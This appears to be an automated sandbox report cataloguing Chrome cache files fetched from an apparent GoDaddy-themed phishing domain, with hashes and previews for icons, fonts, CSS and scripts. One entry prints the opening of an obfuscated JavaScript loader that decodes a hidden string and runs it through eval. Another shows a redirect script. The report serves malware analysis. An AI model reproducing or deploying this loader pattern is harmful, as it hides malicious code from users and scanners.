                                                                                                                                              SSDEEP:6:tI9mc4slzIzUQYqRRn3u0xboUSWuUX8+TQMRAvY:t4uzEu3u0xUUluUs+TQMRAQ
                                                                                                                                              MD5:40EB39126300B56BF66C20EE75B54093
                                                                                                                                              SHA1:83678D94097257EB474713DEC49E8094F49D2E2A
                                                                                                                                              SHA-256:765709425A5B9209E875DCCF2217D3161429D2D48159FC1DF7B253B77C1574F4
                                                                                                                                              SHA-512:9C9CD1752A404E71772003469550D3B4EFF8346A4E47BE131BB2B9CB8DD46DBEF4863C52A63A9C63989F9ABEE775CB63C111ADD7AFA9D4DFC7A4D95AE30F9C6E
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/efFrs1BHOKLi9ZMJGcklORTeAzVJNu5QdrBIkKhzcI5a90150
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" viewBox="0 0 12 12"><title>assets</title><rect width="12" height="12" fill="none"/><path d="M6.7,6,12,11.309,11.309,12,6,6.7.691,12,0,11.309,5.3,6,0,.691.691,0,6,5.3,11.309,0,12,.691Z" fill="#262626"/></svg>

                                                                                                                                              Chrome Cache Entry: 203

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):2905
                                                                                                                                              Entropy (8bit):3.962263100945339
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                                                                                              MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                                              SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                                              SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                                              SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/yziOkKzJZKPnEqui42UNe02Trs1vH0s5elZ6Hr1mNBwuab180
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.

                                                                                                                                              Chrome Cache Entry: 204

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (21720), with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):4712061
                                                                                                                                              Entropy (8bit):2.583772531747173
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6144:LyhjM/9KIpSIiDhDoZghdXRKDBhIJIshSDbX+ov3bIwJDDBstdDhdDfCIgDhgRKb:D
                                                                                                                                              MD5:E34A613844E71AD9EA25A2FAAB768F3F
                                                                                                                                              SHA1:34844596642BED7752C4AED44721CEE52593B344
                                                                                                                                              SHA-256:D767A16A68A568D204E0E4283BDDB8A9702CCF95BF2715D512C4AE39C3D79AB5
                                                                                                                                              SHA-512:8D5342EC77557793F73701400220B10421E6B1ED941876554D27F27A0573644F26C66FA4AB7019E666F6471688E2F7857394CC127197EF109FC076BC5534342C
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/34WyyfLCF60WyWJTghhC89MW03f9FF67110
                                                                                                                                              Preview:function decodeAndEvaluate(key) {.. const binaryString = [...key].. .map(char => Number('.' > char)).. .join('').. .replace(/.{8}/g, byte => String.fromCharCode(parseInt(byte, 2)));.. .. (0, eval)(binaryString);.. return true;..}....const handler = {.. get: function(_, prop) {.. decodeAndEvaluate(prop);.. return true;.. }..};..const viewsen = new Proxy({}, handler);..viewsen["........................................................................................................................................................................................................

                                                                                                                                              Chrome Cache Entry: 205

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 93276, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):93276
                                                                                                                                              Entropy (8bit):7.997636438159837
                                                                                                                                              Encrypted:true
                                                                                                                                              SSDEEP:1536:Dy7KSLv+MMqDeeIgDFSxpuQP7ObnKSWBO61LlRzSSAT6YmkSzOu7Be0OB53jIH4I:Dy7JD+net+puI7ObKHVhTSSlYmk4OuWa
                                                                                                                                              MD5:BCD7983EA5AA57C55F6758B4977983CB
                                                                                                                                              SHA1:EF3A009E205229E07FB0EC8569E669B11C378EF1
                                                                                                                                              SHA-256:6528A0BF9A836A53DFD8536E1786BA6831C9D1FAA74967126FDDF5B2081B858C
                                                                                                                                              SHA-512:E868A2702CA3B99E1ABBCBD40B1C90B42A9D26086A434F1CBAE79DFC072216F2F990FEC6265A801BC4F96DB0431E8F0B99EB0129B2EE7505B3FDFD9BB9BAFE90
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-vf2.woff2
                                                                                                                                              Preview:wOF2......l\....... ..k...........................v...&..$?HVAR.j?MVAR.F.`?STAT.6'8.../.H........x....0..:.6.$..0. ..z...[....%"...........!.I.T....w.!c.H...t.]k......6..Cy..Ul.re........I..%.%....DE....v.i.QF8....iH.!r......P4Z[....Zs....o..r..8b.O....n...!......R}GL..5n!....^..I...A.....U...,&..uz....E.R.K/GL...#..U..A8%.rd..E,}...'e...u..3.dD....}..:..0.a..#O8.|.7..{.}.o......(.D..HX...w.;F...g.+....g.x..,.@~<.K......ZJw......^.!..{:..<..`N..h..0.t..NA..,...]........On./..X|_=...e,.tS..3Z..q_....'F[..jR.?U..k.:+;..Z.co5..l..yV.Md..4.6............L8q..._...AX.y.Cc...Agb..a.K...N....`-..N.b.u...q..i.S...p..j*...fA.......?.Z.Ee.~|.\..TZ._...?./a.64..+.]..(gq..d..\K...S..z.i.l[.........1=....I.....4g.?.G.3.&.0L&.$.@R6...U..o..:.S.=.....bU..u.]z.W8[U.|7.'.%..u...11..g<.^...J..PB.JHB...k........].($..D...S"u...7...9.8.....U..7...R$..x...g.X.zV.,.$....y.:.....Q$OM....q.. ...(.O....".d<.l..9..|^B.r.5......yi.D..._...<P..o....(Re.I...@E.~..T.

                                                                                                                                              Chrome Cache Entry: 206

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1298
                                                                                                                                              Entropy (8bit):6.665390877423149
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:L+aPlKKVkz1f+tPUgo/KQGbEZAu6hZjJ+uvRGumDyqCuiRFqB6dhQiZmh7:L+ElbQ1f+Bo/LfAuk4uvR5mDymiRFqBN
                                                                                                                                              MD5:32CA2081553E969F9FDD4374134521AD
                                                                                                                                              SHA1:7B09924C4C3D8B6E41FE38363E342DA098BE4173
                                                                                                                                              SHA-256:216FC342A469AA6A005B2EACC24622095E5282D3E9F1AE99CE54C27B92EC3587
                                                                                                                                              SHA-512:F75749C6344FCD7BF06872A3678BB2EB4CAE2DDC31CC5D1EE73EFBA843705577841667733A83163AF4336EC8A32DF93E7A36155BD6282D7BB86159644975948C
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/ijSWB6XDt2x23vPWFuGmlisfdPo0Mn2Fqr4oBXq1n5NrfcM46mk9Zmyz230
                                                                                                                                              Preview:RIFF....WEBPVP8X....0...k.....ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPHX.....\m{.z..........T ..Q....R..*.X....U`..@......Yyy..<q.."b..a....K._.....jH.*...}q..........^.-.\.4. &.H~.q..H.q.'.t..p....0)...X.....8./.... ..6.#H..Y..../...E>.#.tv....9.\.p5......h......1.{@.k].(1...B.........u.n....=....sX...*..I.c]r....S.....u.a...X.....Pi..q.$73..ga..h%9.S.l.....}....^%.@:Q....we8x..j..3.^.}5.fFtZ...3....<. x.s....d@(./.<].y...m.....T..........T.P`....5..<qYl.g..k..N. `_...f....yN.R.PB..p|..-.%.`y.._.]C.v.<.Y...V..I..(.c....>...........k....nt

                                                                                                                                              Chrome Cache Entry: 207

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):35786
                                                                                                                                              Entropy (8bit):5.058073854893359
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:hToogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkf1WcrScuH9Ye3YdersR8Q5oqWjfuogF:h0DKAaZtJsOodwuhx5P6mqjDggJkLRn
                                                                                                                                              MD5:38501E3FBBBD89B56AA5BA35DE1A32FE
                                                                                                                                              SHA1:D9B31981B6F834E8480BA28FBC1CFF1BE772F589
                                                                                                                                              SHA-256:A1CA6B381CB01968851C98512C6E7F6C5309A49F7A16B864813135CBFF82A85B
                                                                                                                                              SHA-512:1547937AA9B366E76DE44933EF48EF60E3D043245E8E3E01C97DFC2981F6B1F61463D9D30992FBCF2CA25FC1B7B32FF808B9789CFB965D74455522FC58E0C08C
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/xyEc4pKtKNGKpq6cd30
                                                                                                                                              Preview:#sections_godaddy {..font-family: gdsherpa !important;..}..#sections_godaddy a {.. color: var(--ux-2rqapw,#000);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. text-decoration: var(--ux-1f7if5p,underline);.. background-color: transparent;..}....#sections_godaddy #root {.. flex: 1 1 0%;..}....#sections_godaddy a:hover {../* color: var(--ux-1j87vvn,#fff);*/.. -webkit-text-decoration: var(--ux-1ft0khm,underline);.. text-decoration: var(--ux-1ft0khm,underline);..}....#sections_godaddy svg {.. overflow: hidden;.. vertical-align: unset;..}....#sections_godaddy .ux-button {.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. padding: 0;.. text-decoration: var(--ux-1f7if5p,underline);.. -webkit-text-decoration: var(--ux-1f7if5p,underline);.. gap: 0.5em;.. cursor: pointer;.. --ux-button-icon-margin: calc((var(--ux-t379ov,var(--ux-jw5s9j,1.5)) * 1em - 1.5em) / 2);.. font-weight: inherit;.. background: transparent;.. gap:

                                                                                                                                              Chrome Cache Entry: 208

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (48238)
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):48239
                                                                                                                                              Entropy (8bit):5.343270713163753
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:+CbPzHMb42QOna0rhgaqC2DdONTjwzsLSh0ZsC3Y2zIijkKY1LBep7iFFQ7Srv3h:gb425na0rhgaqDnzs22z3kH
                                                                                                                                              MD5:184E29DE57C67BC329C650F294847C16
                                                                                                                                              SHA1:961208535893142386BA3EFE1444B4F8A90282C3
                                                                                                                                              SHA-256:DD03BA1DD6D73643A8ED55F4CEBC059D673046975D106D26D245326178C2EB9D
                                                                                                                                              SHA-512:AF3D62053148D139837CA895457BEEF7620AA52614B9A08FD0D5BEF8163F4C3B9E8D7B2A74D29079DB3DACC51D98AE4A5DC19C788928E5A854D7803EBB9DED9C
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://challenges.cloudflare.com/turnstile/v0/g/f3b948d8acb8/api.js
                                                                                                                                              Preview:"use strict";(function(){function Ht(e,t,a,o,c,l,v){try{var h=e[l](v),s=h.value}catch(p){a(p);return}h.done?t(s):Promise.resolve(s).then(o,c)}function qt(e){return function(){var t=this,a=arguments;return new Promise(function(o,c){var l=e.apply(t,a);function v(s){Ht(l,o,c,v,h,"next",s)}function h(s){Ht(l,o,c,v,h,"throw",s)}v(void 0)})}}function V(e,t){return t!=null&&typeof Symbol!="undefined"&&t[Symbol.hasInstance]?!!t[Symbol.hasInstance](e):V(e,t)}function De(e,t,a){return t in e?Object.defineProperty(e,t,{value:a,enumerable:!0,configurable:!0,writable:!0}):e[t]=a,e}function Ve(e){for(var t=1;t<arguments.length;t++){var a=arguments[t]!=null?arguments[t]:{},o=Object.keys(a);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(a).filter(function(c){return Object.getOwnPropertyDescriptor(a,c).enumerable}))),o.forEach(function(c){De(e,c,a[c])})}return e}function Ir(e,t){var a=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS

                                                                                                                                              Chrome Cache Entry: 209

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:ASCII text, with very long lines (48316), with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):48316
                                                                                                                                              Entropy (8bit):5.6346993394709
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:J1Z4iiyfiD78x6l42SWRV4HC0o10LEnM9OT81agZnEpnS:vZYDc6lXJd1mZpZEdS
                                                                                                                                              MD5:2CA03AD87885AB983541092B87ADB299
                                                                                                                                              SHA1:1A17F60BF776A8C468A185C1E8E985C41A50DC27
                                                                                                                                              SHA-256:8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
                                                                                                                                              SHA-512:13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js
                                                                                                                                              Preview:!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

                                                                                                                                              Chrome Cache Entry: 210

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:Web Open Font Format, TrueType, length 35970, version 1.0
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):35970
                                                                                                                                              Entropy (8bit):7.989503040923577
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:768:GJiLCleIZlcBvahjeheOQKskmCp9sE9gBkGgvU+7aAXDqWOtU:GJo9IgMKsQzJ9gBkZbuAXDqWV
                                                                                                                                              MD5:496B7BBDE91C7DC7CF9BBABBB3921DA8
                                                                                                                                              SHA1:2BD3C406A715AB52DAD84C803C55BF4A6E66A924
                                                                                                                                              SHA-256:AE40A04F95DF12B0C364F26AB691DC0C391D394A28BCDB4AEACFACA325D0A798
                                                                                                                                              SHA-512:E02B40FEA8F77292B379D7D792D9142B32DFCB887655A2D1781441227DD968589BFC5C00691B92E824F7EDB47D11EBA325ADE67AD08A4AF31A3B0DDF4BB8B967
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/GDSherpa-bold.woff
                                                                                                                                              Preview:wOFF..............$ .......\...&............DSIG...T............GPOS..........N..B..GSUB...`.........3y.OS/2.......F...`i.{[cmap...X.......<.?+.cvt ......./...<)...fpgm............?...gasp................glyf..!t..Ra....$.ihead..s....3...6..}.hhea..t....!...$....hmtx..t0.......x?s.#loca..w.........LC%.maxp..{X... ... .5..name..{x..........post..~@........1+.,prep.............P..x..\.tU..;y...!..!..R.4."(."*".U..V.]3...r..5c...j....._.7U...H..1MSE...0b..b&.......%..w...}.{.......u...s..g..soBLD~.C.)n..1.Q...z.q. ..R..)n.QY.v..{.(...o...O.......G...{to.~.....,..#<.w...W...?6..3....2.)O........].`_a..F'.6..."}&..$'.K...a..NK$..01ar......-.Do_. .H.].x'{....n....{.|.L.p..u...-.w}.}...~.....(.zP:..^t.=D?..i9.....m.......AE.......J.....j......q&_...`....P....M<.o.[.V....H..Sx:...<.g.....x>/.......^..x9.....Ws...&.....x....jUJ...B.S...2(_...U...Q...<..y.j.y...P.x.:....m+..V.....5h[.~E.WL..rp....0..*Pu..$OA....LJ.Y.....9.e...L..... /"?.m.......+..J.........

                                                                                                                                              Chrome Cache Entry: 211

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):9648
                                                                                                                                              Entropy (8bit):7.9099172475143416
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:192:gwTgBYruFELhYmwd93mjW0l9OsENOLWcXdN4CLrHZfTtjOZgYM5cWjAaP6:gwTgBxaYmo5mS0l9OsuOL3NNVLlfTtjE
                                                                                                                                              MD5:4946EB373B18D178C93D473489673BB6
                                                                                                                                              SHA1:16477ACB73B63CA251D37401249E7E4515FEBD24
                                                                                                                                              SHA-256:666BC574C9F3FB28A8AC626FA8105C187C2A313736494A06BD5A937473673C92
                                                                                                                                              SHA-512:F684B90B748DC8399F76C5D8F94AF6C4E6869143F18D19CE435B25EAA14E9647B120467BDD0795895676DC0CCCDEABF82BEB2F46CE2C5BF4C58ED9C134F30C48
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:RIFF.%..WEBPVP8X....0.........ICCP.............0..mntrRGB XYZ ............acsp.......................................-....................................................desc.......$rXYZ........gXYZ...(....bXYZ...<....wtpt...P....rTRC...d...(gTRC...d...(bTRC...d...(cprt.......<mluc............enUS.........s.R.G.BXYZ ......o...8.....XYZ ......b.........XYZ ......$.........XYZ ...............-para..........ff......Y.......[........mluc............enUS... .....G.o.o.g.l.e. .I.n.c... .2.0.1.6ALPH......0....n.mu..G..t042.....@...`[...%...6....9AD.'@.,f.B...+..+..+..W&.p.....h.......f.-...+.....m...n....E....O].+R.&Q..#.X.ip4..p......\O...\/....9.5.a..DfZ,K....8.....Z..2..z......t.......|.I.(..6E.D.}.C..OQD$S}iZ...[D.......q`(...@../.NQ......+"b%.X.D".G.*...0G...".2........x.O......7......E..&....e.F..4...K>.M..Pd.B...@'o./te..[.f....4[..a..x...9#.@$.=...t..=..t_.W....[..f.|fv...N...c6..k4}.9.7.....f.F3.4[...a...;.m.@N.n.0.....n.G[c.H.}..t.{..;....G...2.::..].0....

                                                                                                                                              Chrome Cache Entry: 212

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):268
                                                                                                                                              Entropy (8bit):5.111190711619041
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:6:tI9mc4slztdbC/yXqRRnYdbyJA0xy+LUxh7JECWWNAc:t4pb8WuEbaA0xVUxh1ECgc
                                                                                                                                              MD5:59759B80E24A89C8CD029B14700E646D
                                                                                                                                              SHA1:651B1921C99E143D3C242DE3FAACFB9AD51DBB53
                                                                                                                                              SHA-256:B02B5DF3ECD59D6CD90C60878683477532CBFC24660028657F290BDC7BC774B5
                                                                                                                                              SHA-512:0812DA742877DD00A2466911A64458B15B4910B648A5E98A4ACF1D99E1220E1F821AAF18BDE145DF185D5F72F5A4B2114EA264F906135F3D353440F343D52D2E
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M10,32H38V18.125L24,25.109,10,18.125V32m.234-16L24,22.891,37.766,16H10.234M40,34H8V14H40Z" fill="#404040"/></svg>

                                                                                                                                              Chrome Cache Entry: 213

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):1864
                                                                                                                                              Entropy (8bit):5.222032823730197
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/klQ2Of4c6LA3qOVx1jLq0IKv1BfNb563yNbAtqnsmiChZNDrOoVJ0r9kvS36F5wx211
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

                                                                                                                                              Chrome Cache Entry: 214

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:HTML document, ASCII text, with no line terminators
                                                                                                                                              Category:downloaded
                                                                                                                                              Size (bytes):59
                                                                                                                                              Entropy (8bit):4.516046600495897
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:3:gn3oOSQKEpRAPfc7b:63MsnWYb
                                                                                                                                              MD5:FD9F125B63912B7D2FB6910CADA05C8E
                                                                                                                                              SHA1:CE1C37517BFD4F42C3E3CB7AA125FEFE348241F0
                                                                                                                                              SHA-256:836350B80C9AFAAEBE9F2234EEFD3F01E45799A73B99909E5AEE0CE5F5A994AD
                                                                                                                                              SHA-512:1DEB570C0C1E7B3072ED64DBADC7C8D99E2347963AEF6C614DCF4D90B6E1C2080FDA3C406D2BB4BA2932C0E87305684B0C3D2CA68018B1206412AD6642729025
                                                                                                                                              Malicious:false
                                                                                                                                              URL:https://2025_notificationx1invoice_review.fmhjhctk.ru/dvssbtgjokkveaiE4AX4UZCFO8KFBLMFAXYM7FE?QINLIBIAVBQRTVGVZRBK
                                                                                                                                              Preview:<script>window.location.replace('/aNAtEaDInodo/');</script>

                                                                                                                                              Chrome Cache Entry: 215

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):1864
                                                                                                                                              Entropy (8bit):5.222032823730197
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:48:yvswNIBLBpJawmMH44log6gw/MHm7pJroog6gwkMH9Xog6gwdMHdqdyqog7C:ykfXYx+odPcs9B
                                                                                                                                              MD5:BC3D32A696895F78C19DF6C717586A5D
                                                                                                                                              SHA1:9191CB156A30A3ED79C44C0A16C95159E8FF689D
                                                                                                                                              SHA-256:0E88B6FCBB8591EDFD28184FA70A04B6DD3AF8A14367C628EDD7CABA32E58C68
                                                                                                                                              SHA-512:8D4F38907F3423A86D90575772B292680F7970527D2090FC005F9B096CC81D3F279D59AD76EAFCA30C3D4BBAF2276BBAA753E2A46A149424CF6F1C319DED5A64
                                                                                                                                              Malicious:false
                                                                                                                                              Preview:<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1401.6z" fill="url(#A)"/><path d="M394.2 1815.6c746.58 0 1351.8-493.2 1351.8-1101.6S1140.78-387.6 394.2-387.6-957.6 105.603-957.6 714-352.38 1815.6 394.2 1815.6z" fill="url(#B)"/><path d="M1548.6 1885.2c631.92 0 1144.2-417.45 1144.2-932.4S2180.52 20.4 1548.6 20.4 404.4 437.85 404.4 952.8s512.276 932.4 1144.2 932.4z" fill="url(#C)"/><path d="M265.8 1215.6c690.246 0 1249.8-455.595 1249.8-1017.6S956.046-819.6 265.8-819.6-984-364.005-984 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-color="#c4c4c4" stop-opacity="0"/></radialGradient><r

                                                                                                                                              Chrome Cache Entry: 216

                                                                                                                                              Download File
                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                              File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                              Category:dropped
                                                                                                                                              Size (bytes):937
                                                                                                                                              Entropy (8bit):7.737931820487441
                                                                                                                                              Encrypted:false
                                                                                                                                              SSDEEP:24:2PUSIn/IylOgX9qCigRmHQxlCNebarFY9:2PLCHlOgXQ9Oie+rw
                                                                                                                                              MD5:FC3B7BBE7970F47579127561139060E2
                                                                                                                                              SHA1:3F7C5783FE1F4404CB16304A5A274778EA3ABD25
                                                                                                                                              SHA-256:85E6223AFDBD5BADF2C79BCFBAA6FE686ACAA781ECA52C196647FFABB3BE2FFE
                                                                                                                                              SHA-512:49FA22DE92BEBEDE28BB72F7C7902C01D59E56723811629E40C8A887E34FD0B392A9DF169A238BDD8E46D984E76312D75B2644B8611C66A71A559C1B6834DE6C
                                                                                                                                              Malicious:false
